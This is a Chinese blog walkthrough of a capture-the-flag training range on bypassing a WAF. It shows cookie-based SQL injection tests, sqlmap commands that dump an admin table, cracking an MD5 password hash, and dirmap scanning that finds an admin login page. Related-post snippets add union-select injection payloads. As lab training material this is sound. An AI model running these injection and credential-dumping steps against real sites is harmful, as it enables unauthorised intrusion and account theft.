封神台--第二章:遇到阻难!绕过WAF过滤!解题思路

最新推荐文章于 2024-03-21 21:29:45 发布
最新推荐文章于 2024-03-21 21:29:45 发布
阅读量5.4k 收藏 10
点赞数 4
分类专栏: 渗透测试 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/E08640104/article/details/115639842
版权

题目:

尤里在得到女神家网站密码后,却发现注入点权限很小,凭他的皮毛技术也没找到网站后台,
这时尤里通过旁站查询,他发现了女神家网站是用的主机空间托管,
他立刻扫描旁站,果然发现一个站点,且后台是默认路径……
尤里冷笑一声行动了起来,却发现有一层防火墙拦在了他的面前。。

一、查找sql注入点

进入测试页面http://59.63.200.79:8004/

1)字符型、数字型等盲注尝试

随意点开一篇文章,构造单引号',双引号"等闭合查询语句,发现提示如下

网站对请求地址进行了WAF防护,通过测试没有过滤 == order by、union ==

网页防护一般只拦截get、post传参,因此尝试cookie注入

2)cookie注入

cookie注入提交的参数以cookie方式提交,判断步骤 

1.找到http://59.63.200.79:8004/shownews.asp?id=171带参数的URL。

2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。

3.清空浏览器地址栏,输入“javascript:alert(document.cookie="id="+escape("xx"));”,按Enter键后弹出一个对话框,内容是“id=xx”,然后用原来的URL刷新页面,如果显示正常,说明应用使用Request("id")这种方式获取数据的。

4.重复上面的步骤,将常规SQL注入中的判断语句带入上面的URL:“javascript:alert(document.cookie="id="+escape("xx and 1=1"));” “javascript:alert(document.cookie="id="+escape("xx and 1=2"));”。和常规SQL注入一样,如果分别返回正常和不正常页面,则说明该应用存在注入漏洞,并可以进行cookie注入。

 

二、使用sqlmap进行cookie注入

1)拆解表 

命令:sqlmap -u http://59.63.200.79:8004/shownews.asp\? --cookie "id=171" --tables   --level 2  --thread 10 --batch


[21:00:09] [WARNING] cannot retrieve table names, back-end DBMS is Microsoft Access
<current>
[8 tables]
+----------+
| user     |
| admin    |
| download |
| feedback |
| market   |
| news     |
| product  |
| vote     |
+----------+

2)拆解字段   

命令:sqlmap -u http://59.63.200.79:8004/shownews.asp\? --cookie "d=171" -T admin --column   --level 2  --thread 10 --batch

[21:23:22] [WARNING] cannot retrieve column names, back-end DBMS is Microsoft Access
Database: <current>
Table: admin
[7 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| user     | non-numeric |
| content  | non-numeric |
| flag     | non-numeric |
| id       | numeric     |
| password | non-numeric |
| title    | non-numeric |
| username | non-numeric |
+----------+-------------+

3)拆解字段值 

命令:sqlmap -u http://59.63.200.79:8004/shownews.asp\? --cookie "id=171" -T admin -C flag,user,password  --dump  --level 2  --thread 10 --batch


Table: admin
[1 entry]
+----+---------+-------------------------------------------------+--------+------------------+----------+------------------+
| id | flag    | title                                           | user   | content          | username | password         |
+----+---------+-------------------------------------------------+--------+------------------+----------+------------------+
| 1  | <blank> | \x8eV\xfdg:h\xb0N]\xe8Y4|sb\xc9QK??TX130N\xba | admin  | <P><FONT size=2> | admin    | b9a2a2b5dffb918c |
+----+---------+-------------------------------------------------+--------+------------------+----------+------------------+

4)密码解码

网站:https://www.cmd5.com/

使用密码b9a2a2b5dffb918c进行md5解码,得到密码为:welcome

三、后台扫描出登录地址

1)使用dirmap进行后台扫描

命令: python3 dirmap.py -i 59.63.200.79:8004 -lcf

(python源码,后台扫描器dirmap安装使用方法 :https://www.bilibili.com/read/cv6981656/


                     #####  # #####  #    #   ##   #####
                     #    # # #    # ##  ##  #  #  #    #
                     #    # # #    # # ## # #    # #    #
                     #    # # #####  #    # ###### #####
                     #    # # #   #  #    # #    # #
                     #####  # #    # #    # #    # #   v1.0

[*] Initialize targets...
[+] Load targets from: 59.63.200.79:8004
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://59.63.200.79:8004/
[*] Launching auto check 404
[+] Checking with: http://59.63.200.79:8004/rspecqjkmwmiribyeumjmlgmkvofngbouoxljtyrsg
[*] Use recursive scan: No
[*] Use dict mode
[+] Load dict:/Users/111/111/111/111/111/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][5.37kb] http://59.63.200.79:8004/admin/login.asp

扫描发现登陆地址

2)最后登录获取flag提交

哈哈普拉斯
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2010
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码尤里正在追女神小芳,在得知小芳开了一公司后,尤里通过whois查询发现了小芳公司网站,学过一黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
神台----尤里的复仇I-第二章遇到阻难绕过WAF过滤
正在学习的路上...
07-18 3432
1.找注入 进去之后,查看新闻,一般在这里有注入。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
神台——尤里的复仇Ⅰ 小芳!
最新发布
ASD830的博客
03-21 413
我们可以查出“admin“”表里 有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码,我们看一下username和password字段的内容。尤里正在追女神小芳,在得知小芳开了一公司后,尤里通过whois查询发现了小芳公司网站。根据提示我们需要浅浅的sql注入一下,首先判断一下是否存在SQL注入漏洞。学过一黑客技术的他,想在女神面前炫炫技。页面不正常,说明存在SQL注入漏洞。页面出现了2,说明我们的回显位为2。页面不正常,判断出字段数为2。
神台靶场 kali训练营第二关WP
qq_54060725的博客
05-26 948
神台靶场 kali训练营第二关WP
第二章遇到阻难绕过WAF过滤
m0_51195235的博客
12-14 458
第二章遇到阻难绕过WAF过滤
神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难绕过WAF过滤
qq_44336568的博客
06-28 1374
神台----尤里的复仇I-第二章遇到阻难绕过WAF过滤!渗透学习、靶场练习
神台第二关
weixin_44106116的博客
11-21 2162
1第一种方法 1 查看是否能够SQL注入 开第一个新闻,用and 1=1 查看是否存在SQL注入发现弹出禁用参数对话框 再使用order by ,查看共有几个字段,发现order by 可以用,共十个 因为网页的防护,一般只拦截GET和POST,忽略了cookie也可以传参。所以尝试cookie注入 1.1附加知识 cookie 类型为“小型文本文件”,是网站给客户端的身份证,由客户端暂时或...
尤里的复仇Ⅰ 小芳!
HNU凌风的博客
03-10 713
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码尤里正在追女神小芳,在得知小芳开了一公司后,尤里通过whois查询发现了小芳公司网站 学过一黑客技术的他,想在女神面前炫炫技。于是他打开了传送门(小芳公司网站). 第一步,判断是否存在sql注入漏洞 在网站后构造?id=1 and 1=1 ,然后回车 页面返回正常 再次构造 ?id=1 and 1=2 然后回车 这里页面返回异常,初步判断这里可能存在一个sql注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 or
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
aws-waf-sqli-bypass-PoC:使用单个';'绕过AWS WAF
04-27
介绍适用于SQlInjectionMatchTuple的AWS WAF文档( )指出:“文本转换消除了攻击者的某些异常格式在Web请求中使用,以绕过AWS WAF。如果您指定转换,则AWS WAF在检查匹配请求之前对FieldToMatch执行转换。” 更具体...
what-the-waf:更努力地绕过那个 WAF..
07-03
丽莎:神圣的 WAF! Blackhat(偷偷摸摸地自言自语):WAF?! 那很痛。 丽莎:汤姆,你这个 WAF,像兔子一样! 黑帽(自言自语):等狗屎砸到WAF的时候吧,甜心! Tom(注意到 Blackhat 并说):你为什么不自己...
Charset_encoding-Burp:利用字符集编码绕过waf的burpsuite插件
05-18
BurpSuite Plugin通过字符集编码绕过waf的burp插件因为小伙伴在实战中有这么个需求(利用字符集编码绕过waf),所以我借着他的这个需求也学习了下burp插件的编写。预览ASP.NET+IIS使用说明其实这种方法很早就出来了...
lua-resty-waf:基于OpenResty堆栈的高性能WAF
02-03
**lua-resty-waf简介** `lua-resty-waf`是一个高效的Web应用防火墙(WAF),它构建在OpenResty平台上,利用Lua语言的强大功能为Nginx提供动态的安全策略执行。OpenResty集成了Nginx与LuaJIT,使得我们可以编写高...
神台 第二章 绕过WAF
m0_65712192的博客
10-14 751
神台 第二章 利用ModHeader绕过WAF
神台尤里的复仇1第二章遇到阻难绕过WAF过滤
m0_63002183的博客
10-10 250
填写请求头:id=1171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin。打开ModHeader插件:(前面一篇文章给出了如何下载和打开该插件,大有兴趣可以看看,这里就不赘述了)这篇文章就到这里了,希望能对大有所帮助。
掌控安全靶场第二章遇到阻难绕过WAF过滤
k1k5cn的博客
11-10 2495
最近在学习CTF,前不久发现一个还不错的靶场 神台 - 掌控安全在线演练靶场 二话不说,开干吧 第二章遇到阻难绕过WAF过滤! 一、测试是否有注入 附上链接 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb 标题上写了是【配套课时:SQL注入攻击原理 实战演练】SQL注入, 随便击一个新闻。在id=171后面加一个引号’,测试一下是否有SQL注入。 有弹框了,提示过滤了很多关键字。下一步考虑如何绕过这些关键字。 二、绕过WAF关键字过滤
第二章遇到阻难绕过WAF过滤!【SQL注入攻击】
野马菲比的博客
07-21 1050
爆破andexists(select*from表名),如果页面返回正常,就存在这个表。exists这个函数就是检查子查询能否查询到数据,如果能会返回一个True。靶场http//kypt8004.ia.aqlab.cn/根据md5的特征,猜测为md5加密;解密为welcome。1、判断是否存在注入发现过滤。说明存在admin表。如果不知道字段怎么办?就一个库,无需知道。...
神台-第二章 尤里的复仇
ploto_cs的博客
09-26 2060
神台-第二章 尤里的复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入 3.判断字段数 ?id=170+order+by+10 ?id=170+order+by+11 4.使用modheader 直接在url中输入 报错 第一个字段写cookie 第二个字段 id=170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+from+admin 5.在url中输入http://59.63.200.79:8004/shownews.asp
sqlmapapi绕过waf
09-04
绕过WAF使用sqlmapapi,有几种方法可以尝试。首先,可以利用MySQL的版本号注释功能绕过WAF,这是一种常见的绕过方法。此外,还可以使用一些其他技巧,比如使用0xA0代替空格、利用特殊用法如\N和.e浮绕过WAF,以及使用&&代替and等关键字和大括号注释来绕过WAF。这些方法可以绕过一些WAF对SQL注入过滤规则。 另外,还可以尝试利用HTTP协议的不同版本进行粘包来绕过某些WAF,因为一些WAF在解析数据包时可能会出现问题。通过发送不同版本协议的粘包,可以绕过WAF的检测。 此外,还可以利用URL编码、charset编码、MIME编码等进行绕过WAF。这些编码技巧可以混淆注入语句,使其绕过WAF过滤规则。 如果你想了解更多关于绕过WAF的方法,可以参考sqlmap的temper插件。该插件提供了更多关于数据库的绕过技巧,可以帮助你绕过WAF的防护机制。你可以在sqlmap的GitHub地址上找到这个插件。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [常见的WAF绕过方法](https://blog.csdn.net/wutianxu123/article/details/104260945)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值